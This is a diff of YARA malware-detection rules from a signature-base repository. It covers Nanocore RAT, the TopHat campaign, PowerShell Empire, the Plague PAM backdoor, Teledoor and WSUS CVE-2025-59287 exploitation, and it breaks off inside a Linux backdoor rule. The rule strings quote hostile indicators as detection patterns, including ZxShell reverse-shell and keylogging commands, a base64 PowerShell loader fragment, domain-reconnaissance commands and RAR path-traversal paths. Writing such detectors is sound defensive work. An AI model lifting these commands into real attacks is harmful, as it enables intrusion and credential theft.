+		$s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Zxshell_Related_Malware_CN_Group_Jul17_3 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects a ZxShell related sample from a CN threat group"
+		description = "Detects Nanocore RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1900b861-b4a2-50b5-a639-3eb442072139"
-		date = "2017-07-08"
+		id = "6db0c8a7-8c31-58a6-8732-de6663fec16b"
+		date = "2018-02-19"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L60-L74"
+		reference = "Internal Research - T2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L92-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d7dd59cf6ef24ce47431f9f3fbc980019880082b4e6162bae70b64abaa26db7"
+		logic_hash = "824fd7304fb298ced69811078aa2dd23d7116554cffb8b6e4b690fccc93a4caf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2e5cf8c785dc081e5c2b43a4a785713c0ae032c5f86ccbc7abf5c109b8854ed7"
+		hash1 = "aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c"
 
 	strings:
-		$s1 = "%s\\nt%s.dll" fullword ascii
-		$s2 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
+		$x1 = "NanoCore Client.exe" fullword ascii
+		$x2 = "NanoCore.ClientPluginHost" fullword ascii
+		$s1 = "PluginCommand" fullword ascii
+		$s2 = "FileCommand" fullword ascii
+		$s3 = "PipeExists" fullword ascii
+		$s4 = "PipeCreated" fullword ascii
+		$s5 = "IClientLoggingHost" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_Zxshell_Jul17 : FILE
+rule SIGNATURE_BASE_Nanocore_RAT_Feb18_2 : FILE
 {
 	meta:
-		description = "Detects a ZxShell - CN threat group"
+		description = "Detects Nanocore RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b009b20-5a19-5cac-aaaf-ca61310eab9f"
-		date = "2017-07-08"
+		id = "83a8ad4d-0bef-5ba2-aa10-eac5601f2c7b"
+		date = "2018-02-19"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/cat-phishing/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L76-L101"
+		reference = "Internal Research - T2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L117-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c7467417ffc8b0ed3037ace9ce4183c9d4a90d1c087a420dd3c7a9c422621b1"
+		logic_hash = "c104e431a4ecc0d18d7eb74e7a55d32bf8978ee922637d48f3f6a9466a0f5b1a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16"
+		hash1 = "377ef8febfd8df1a57a7966043ff0c7b8f3973c2cf666136e6c04080bbf9881a"
 
 	strings:
-		$x1 = "zxplug -add" fullword ascii
-		$x2 = "getxxx c:\\xyz.dll" fullword ascii
-		$x3 = "downfile -d c:\\windows\\update.exe" fullword ascii
-		$x4 = "-fromurl http://x.x.x/x.dll" fullword ascii
-		$x5 = "ping 127.0.0.1 -n 7&cmd.exe /c net start %s" fullword ascii
-		$x6 = "ZXNC -e cmd.exe x.x.x.x" fullword ascii
-		$x7 = "(bind a cmdshell)" fullword ascii
-		$x8 = "ZXFtpServer 21 20 zx" fullword ascii
-		$x9 = "ZXHttpServer" fullword ascii
-		$x10 = "c:\\error.htm,.exe|c:\\a.exe,.zip|c:\\b.zip\"" fullword ascii
-		$x11 = "c:\\windows\\clipboardlog.txt" fullword ascii
-		$x12 = "AntiSniff -a wireshark.exe" fullword ascii
-		$x13 = "c:\\windows\\keylog.txt" fullword ascii
+		$s1 = "ResManagerRunnable" fullword ascii
+		$s2 = "TransformRunnable" fullword ascii
+		$s3 = "MethodInfoRunnable" fullword ascii
+		$s4 = "ResRunnable" fullword ascii
+		$s5 = "RunRunnable" fullword ascii
+		$s6 = "AsmRunnable" fullword ascii
+		$s7 = "ReadRunnable" fullword ascii
+		$s8 = "ExitRunnable" fullword ascii
 
 	condition:
-		( filesize < 10000KB and 1 of them ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
 
-rule SIGNATURE_BASE_Zxshell_20171211_Chrsben : FILE
+rule SIGNATURE_BASE_Tophat_Malware_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects ZxShell variant surfaced in Dec 17"
+		description = "Detects malware from TopHat campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3bbfddb8-011a-52dd-b0c8-b35e6f740507"
-		date = "2017-12-11"
+		id = "ec290eee-a21e-548d-b7cc-3e25e7c39d22"
+		date = "2018-01-29"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/snc85M"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_zxshell.yar#L115-L138"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "361441404582b0eaca25954f7fe1a3a3b9fefd15cac78d61408bc50aeb78bb61"
+		logic_hash = "69a1e1105b28d66203f74e68038efacc926e501e28a73865485adf2fd7fc0ac0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dd01e7a1c9b20d36ea2d961737780f2c0d56005c370e50247e38c5ca80dcaa4f"
+		hash1 = "5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596"
+		hash2 = "1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf"
 
 	strings:
-		$x1 = "ncProxyXll" fullword ascii
-		$s1 = "Uniscribe.dll" fullword ascii
-		$s2 = "GetModuleFileNameDll" fullword ascii
-		$s4 = "$Hangzhou Shunwang Technology Co.,Ltd0" fullword ascii
+		$s1 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
+		$s2 = "UENCRYPTION" fullword ascii
+		$s3 = "TEXPORTAPIS" fullword ascii
+		$s4 = "tcustommemorystream" fullword ascii
+		$s5 = "tmemorystream" fullword ascii
+		$s6 = "ExtrasNoteCONSOLEemb" fullword ascii
+		$s7 = "DIALOG INCLUDE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "de481441d675e9aca4f20bd8e16a5faa" or pe.exports ( "PerfectWorld" ) or pe.exports ( "ncProxyXll" ) or 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "c221006b240b1c993217bd61e5ee31b6" or 6 of them )
 }
-rule SIGNATURE_BASE_MAL_DNSPIONAGE_Malware_Nov18 : FILE
+
+rule SIGNATURE_BASE_Tophat_Malware_Jan18_2 : FILE
 {
 	meta:
-		description = "Detects DNSpionage Malware"
+		description = "Auto-generated rule - file e.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5a0b498b-b2e9-5827-9908-63586b2cf947"
-		date = "2018-11-30"
+		id = "a1b8e477-df8a-5ff4-9108-541a0f082f77"
+		date = "2018-01-29"
 		modified = "2023-01-06"
-		reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dnspionage.yar#L2-L21"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L38-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7f148b790c391283ac833236ad7fd3af7af517098adeaf88b8ee8d95df11487"
+		logic_hash = "2321e89559363c04ef0e92a9c9e03d11ff27410103b3aaba954b544e33961b2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
-		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7"
 
 	strings:
-		$x1 = ".0ffice36o.com" ascii
-		$s1 = "/Client/Login?id=" ascii
-		$s2 = ".\\Configure.txt" ascii
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii
+		$s2 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" ascii
+		$s3 = "LError loading dock zone from the stream. Expecting version %d, but found %d." fullword wide
+		$s4 = "WINMGMTS:\\\\.\\ROOT\\CIMV2" fullword ascii
+		$s5 = "UENCRYPTION" fullword ascii
+		$s6 = "TEXPORTAPIS" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "f98cebcae832abc3c46e6e296aecfc03" and 5 of them )
 }
-rule SIGNATURE_BASE_APT_Dnspionage_Karkoff_Malware_Apr19_1 : FILE
+rule SIGNATURE_BASE_Tophat_BAT : FILE
 {
 	meta:
-		description = "Detects DNSpionage Karkoff malware"
+		description = "Auto-generated rule - file cgen.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be955760-ae94-5f77-928d-f4118a97ae6a"
-		date = "2019-04-24"
+		id = "81e84f1b-0ee7-530d-91ea-645c0994e68f"
+		date = "2018-01-29"
 		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dnspionage.yar#L23-L48"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/#appendix"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tophat.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1e8157cec7e70f7c95dffecd1c5a820f29825586a95f2a5c6e4db0a51b1d4708"
+		logic_hash = "5dc58fa39d8b2aed95b39da575191fe5d10d5dd95b57c320cde8983505e7184f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
-		hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
-		hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
-		hash4 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f998271c4140caad13f0674a192093092e2a9f7794a7fbbdaa73ae8f2496c387"
+		hash2 = "0fbc6fd653b971c8677aa17ecd2749200a4a563f9dd5409cfb26d320618db3e2"
 
 	strings:
-		$x1 = "Karkoff.exe" fullword wide
-		$x2 = "kuternull.com" fullword wide
-		$x3 = "rimrun.com" fullword wide
-		$s1 = "C:\\Windows\\Temp\\" wide
-		$s2 = "CMD.exe" fullword wide
-		$s3 = "get_ProcessExtensionDataNames" fullword ascii
-		$s4 = "get_ProcessDictionaryKeys" fullword ascii
+		$s1 = "= New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"" ascii
+		$s2 = "goto Start" fullword ascii
+		$s3 = ":Start" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		filesize < 5KB and all of them
 }
-
-rule SIGNATURE_BASE_Apt_RU_Turla_Kazuar_Debugview_Pefeatures : FILE
+rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A1 : FILE
 {
 	meta:
-		description = "Turla mimicking SysInternals Tools- peFeatures"
-		author = "JAG-S"
-		id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
-		date = "2020-05-28"
+		description = "Detects suspicious sample with PowerShell content "
+		author = "Florian Roth (Nextron Systems)"
+		id = "1699f153-f972-5e06-a94b-eb95af637e6b"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/sysinturla"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_kazuar.yar#L15-L59"
+		reference = "PowerShell Empire Eval"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_empire_eval.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "10c2e47e5c1885c7dc19d1fb7933c9b15911cbe4c6fba99b7f763738ae934126"
-		score = 85
+		logic_hash = "e77ff4e216601c62a049569a6ea1aae13fc2612b480f4d7fad4e99dc72155da3"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		version = "2.0"
-		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
-		hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4d10e80c7c80ef040efc680424a429558c7d76a965685bbc295908cb71137eba"
+
+	strings:
+		$s1 = "powershell" wide
+		$s2 = "pshcmd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.version_info [ "LegalCopyright" ] == "Test Copyright" and ( ( pe.version_info [ "ProductName" ] == "Sysinternals DebugView" and pe.version_info [ "Description" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "FileVersion" ] == "4.80.0.0" and pe.version_info [ "Comments" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "OriginalName" ] contains "DebugView.exe" and pe.version_info [ "InternalName" ] contains "DebugView.exe" ) or ( pe.version_info [ "OriginalName" ] == "Agent.exe" and pe.version_info [ "InternalName" ] == "Agent.exe" ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_APT_MAL_RU_Turla_Kazuar_May20_1 : FILE
+rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A2 : FILE
 {
 	meta:
-		description = "Detects Turla Kazuar malware"
+		description = "Detects suspicious sample with PowerShell content "
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
-		date = "2020-05-28"
+		id = "8f299fcd-156c-5ce1-8582-c2a4ff2c0cfc"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/sysinturla"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_kazuar.yar#L61-L81"
+		reference = "PowerShell Empire Eval"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_empire_eval.yar#L27-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "547ed3cd88057ab91a0804ecf515eacca04fcf6e490aed1ee0f6a26c3d6b8268"
-		score = 75
+		logic_hash = "28f320e721a61d7e2db39830652038eb4090429d73162888570a97b0bc1504d8"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
-		hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
-		hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
-		hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e14c139159c23fdc18969afe57ec062e4d3c28dd42a20bed8ddde37ab4351a51"
 
 	strings:
-		$s1 = "Sysinternals" ascii fullword
-		$s2 = "Test Copyright" wide fullword
-		$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }
+		$x1 = "\\support\\Release\\ab.pdb" ascii
+		$s2 = "powershell.exe" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_EXPL_Office_Templateinjection_Aug19 : FILE
+rule SIGNATURE_BASE_MAL_LNX_PLAGUE_BACKDOOR_Jul25 : FILE
 {
 	meta:
-		description = "Detects possible template injections in Office documents, particularly those that load content from external sources"
-		author = "Florian Roth"
-		id = "38e970ef-2406-55e0-b3e0-03e7b054a818"
-		date = "2019-08-22"
-		modified = "2025-03-20"
-		old_rule_name = "EXPL_Office_TemplateInjection"
-		reference = "https://attack.mitre.org/techniques/T1221/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_office_template_injection.yar#L1-L20"
+		description = "Detects Plague backdoor ELF binaries, related to PAM authentication alteration."
+		author = "Pezier Pierre-Henri"
+		id = "3b59adb4-91b4-56d1-875e-60de130ae11f"
+		date = "2025-07-25"
+		modified = "2025-09-17"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_plague.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f2bdf3716b39d29a9c6c3b7b3355e935594b8d8e9149a784a59dc2381fa1628a"
-		logic_hash = "8f79a12a7d1e7284fe19d925910988dbbe7448e73df8d5d075310997d09a6348"
-		score = 75
-		quality = 60
+		hash = "14b0c90a2eff6b94b9c5160875fcf29aff15dcfdfd3402d953441d9b0dca8b39"
+		hash = "7c3ada3f63a32f4727c62067d13e40bcb9aa9cbec8fb7e99a319931fc5a9332e"
+		logic_hash = "9ef7d8153c8567f85b8713467bf5b175e0c2af050e1f275fb2441bbca8d20a79"
+		score = 80
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$x1 = /attachedTemplate" Target="http[s]?:\/\/[^"]{4,60}/ ascii
-		$fp1 = ".sharepoint.com"
-		$fp2 = ".office.com"
+		$s1 = "decrypt_phrase"
+		$s2 = "init_phrases"
+		$x1 = "captured_password"
+		$x2 = "updateklog"
+		$x3 = "init_cred_structs"
+		$xop1 = {
+         48 8b [4] 00    // mov     rax, cs:_ent_ptr
+         8b 00           // mov     eax, [rax]
+         3d ca b2 e9 f1  // cmp     eax, 0F1E9B2CAh
+         74              // jz      short loc_4586
+      }
 
 	condition:
-		filesize < 20MB and $x1 and not 1 of ( $fp* )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
 }
-rule SIGNATURE_BASE_EXPL_RAR_Archive_With_Path_Traversal_Aug25 : CVE_2025_8088 CVE_2025_6218 FILE
+rule SIGNATURE_BASE_Teledoor_Backdoor : FILE
 {
 	meta:
-		description = "Detects RAR archives abused for path traversal like CVE-2025-8088 and CVE-2025-6218"
-		author = "Arnim Rupp (Nextron Systems)"
-		id = "de4a42b6-e050-5b7c-9e42-d9e8e0b7e308"
-		date = "2025-08-11"
-		modified = "2025-08-11"
-		reference = "https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/#the-discovery-of-cve-2025-8088"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_rar_archive_with_path_traversal_aug25.yar#L1-L24"
+		description = "Detects the TeleDoor Backdoor as used in Petya Attack in June 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ba9b4415-427e-5a13-b743-bed225d86db8"
+		date = "2017-07-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/CpfJQQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_teledoor.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2a8fafa01f6d3863c87f20905736ebab28d6a5753ab708760c0b6cf3970828c3"
-		hash = "dfab2f25c9d870f30bbc4abb873d155cf4904ece536714fb9cd32b2e0126dfab"
-		hash = "107f3d1fe28b67397d21a6acca5b6b35def1aeb62a67bc10109bd73d567f9806"
-		logic_hash = "eedc5cb144e516a1d50aa8cb2fa386cb44d4c6c2de89267dc1c4d14da972069d"
-		score = 70
+		logic_hash = "785360fa19a61a547309fc7a8968c94d4887be001c6a66b41c7adb9dcd13cb82"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-8088, CVE-2025-6218, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac"
+		hash2 = "f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740"
+		hash3 = "2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277"
 
 	strings:
-		$s1 = "..\\\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu"
-		$s2 = "..//../AppData/Roaming/Microsoft/Windows/Start Menu"
-		$s3 = "/.. /.. /AppData/Roaming/Microsoft/Windows/Start Menu/"
+		$c1 = { 50 61 79 6C 6F 61 64 00 41 75 74 6F 50 61 79 6C 6F 61 64 }
+		$c2 = { 52 75 6E 43 6D 64 00 44 75 6D 70 44 61 74 61 }
+		$c3 = { 00 5A 76 69 74 57 65 62 43 6C 69 65 6E 74 45 78 74 00 4D 69 6E 49 6E 66 6F }
 
 	condition:
-		1 of ( $s* ) and ( uint16( 0 ) == 0x4B50 or int32 ( 0 ) == 0x21726152 )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Rtf_CVE_2018_0802 : CVE_2018_0802 FILE
+rule SIGNATURE_BASE_EXPL_WSUS_Exploitation_Indicators_Oct25 : CVE_2025_59287
 {
 	meta:
-		description = "Attempts to exploit CVE-2018-0802"
-		author = "Rich Warren"
-		id = "162492a3-d792-5f1c-a143-191c62b54728"
-		date = "2018-01-14"
-		modified = "2023-12-05"
-		reference = "http://www.freebuf.com/vuls/159789.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2018_0802.yar#L2-L14"
+		description = "Detects indicators related to the exploitation of the Windows Server Update Services (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)"
+		author = "Florian Roth"
+		id = "ae27e91c-7d77-5204-9ebd-5e8cb8673b68"
+		date = "2025-10-25"
+		modified = "2025-12-05"
+		reference = "https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_wsus_cve_2025_59287.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac1cd4f2162d2c8415e2ee5167cabb8e8aff08a06afe244f5bfe099f2d3fbeb4"
+		logic_hash = "04487cca15f4151bfc31279fd58dc6898e59149cabb6dbef08c1df88418ab904"
 		score = 75
-		quality = 58
-		tags = "CVE-2018-0802, FILE"
+		quality = 85
+		tags = "CVE-2025-59287"
 
 	strings:
-		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
-		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{308,310}2500/ ascii nocase
+		$sl1 = "at System.Data.DataSet.DeserializeDataSetSchema(SerializationInfo info, StreamingContext context" ascii wide
+		$sl2 = "at System.Runtime.Serialization.ObjectManager.DoFixups()" ascii wide
+		$sl3 = "at System.Runtime.Serialization.ObjectManager.CompleteISerializableObject" ascii wide
+		$sl4 = "System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation." ascii wide
+		$sl5 = "ErrorWsusService.9HmtWebServices.CheckReportingWebServiceReporting WebService WebException:System.Net.WebException: Unable to connect to the remote server" ascii wide
+		$se1 = "powershell -ec try{$r= (&{echo https://" ascii wide base64 base64wide
+		$se2 = ":8531; net user /domain; ipconfig " ascii wide base64 base64wide
+		$sa1 = "whoami;net user /domain" ascii wide base64 base64wide
+		$sa2 = "net user /domain; ipconfig /all" ascii wide base64 base64wide
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		all of ( $sl* ) or 1 of ( $se* ) or all of ( $sa* )
 }
-rule SIGNATURE_BASE_Sofacy_Fybis_ELF_Backdoor_Gen1 : FILE
+rule SIGNATURE_BASE_HKTL_EXPL_WSUS_Exploitation_POC_Oct25 : CVE_2025_59287 FILE
 {
 	meta:
-		description = "Detects Sofacy Fysbis Linux Backdoor"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6abf33e-9c5b-5e0f-b7f0-a0741bf9cc3a"
-		date = "2016-02-13"
-		modified = "2023-01-27"
-		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_fysbis.yar#L9-L35"
+		description = "Detects POC for the exploitation of the Windows Server Update Services (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)"
+		author = "Florian Roth"
+		id = "a48741cb-cdd0-51ea-b7e9-278f16990bf0"
+		date = "2025-10-26"
+		modified = "2025-12-05"
+		reference = "https://github.com/jiansiting/CVE-2025-59287/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_wsus_cve_2025_59287.yar#L29-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fb5239aa75512c8c83b066e64b75469f90fb22cb0918af1e44edb29e7ab38206"
-		score = 80
+		logic_hash = "ade02afa7449f0bfcd82065a4246a598bedb46c561bf721b6bf1325fe0fc6239"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
-		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+		tags = "CVE-2025-59287, FILE"
 
 	strings:
-		$x1 = "Your command not writed to pipe" fullword ascii
-		$x2 = "Terminal don`t started for executing command" fullword ascii
-		$x3 = "Command will have end with \\n" fullword ascii
-		$s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" ascii
-		$s2 = "Success execute command or long for waiting executing your command" fullword ascii
-		$s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
-		$s4 = "rm -f /usr/lib/systemd/system/" ascii
